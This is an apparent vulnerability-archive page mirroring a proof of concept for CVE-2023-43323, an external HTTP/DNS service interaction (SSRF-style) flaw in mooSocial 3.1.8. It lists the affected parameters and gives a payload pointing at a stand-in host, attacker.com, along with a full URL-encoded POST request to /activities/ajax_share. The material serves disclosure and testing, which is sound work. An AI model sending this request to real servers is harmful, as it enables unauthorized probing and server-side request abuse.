Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1310 CNY

100%

CVE-2023-43323 PoC — mooSocial 安全漏洞

Source
Associated Vulnerability
Title:mooSocial 安全漏洞 (CVE-2023-43323)
Description:mooSocial 3.1.8 is vulnerable to external service interaction on post function. When executed, the server sends a HTTP and DNS request to external server. The Parameters effected are multiple - messageText, data[wall_photo], data[userShareVideo] and data[userShareLink].
Description
mooSocial v3.1.8 is vulnerable to external service interaction on post function.
Readme
# mooSocial: External HTTP and DNS Service Interaction (CVE-2023-43323)
mooSocial v3.1.8 is vulnerable to external service interaction on post function. When executed, the server sends a HTTP and DNS request to external server.

Vulerable Parameter: **messageText**,  **data[wall_photo]**, **data[userShareVideo]**  and **data[userShareLink]**
## Exploit - Proof of Concept (POC)

### External HTTP and DNS Service Interaction
```
Payload : http://attacker.com/?null=
```
POST Request on /moosocial/activities/ajax_share (POST REQUEST DATA ONLY): 
```
[data%5Btype%5D=User&data%5Btarget_id%5D=0&data%5Baction%5D=wall_post&data%5Bwall_photo%5D=&data%5Bsubject_type%5D=&messageText=asas&data%5BuserShareLink%5D=&data%5BuserShareVideo%5D=http%3A%2F%2Fattacker.com%2F%3Fnull&data%5BuserTagging%5D=&data%5BshareImage%5D=1&data%5Bprivacy%5D=1]
```


![image](https://github.com/ahrixia/CVE-2023-43323/assets/35935843/1f0ddaf9-8777-4b00-91e6-b66b062b817f)
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →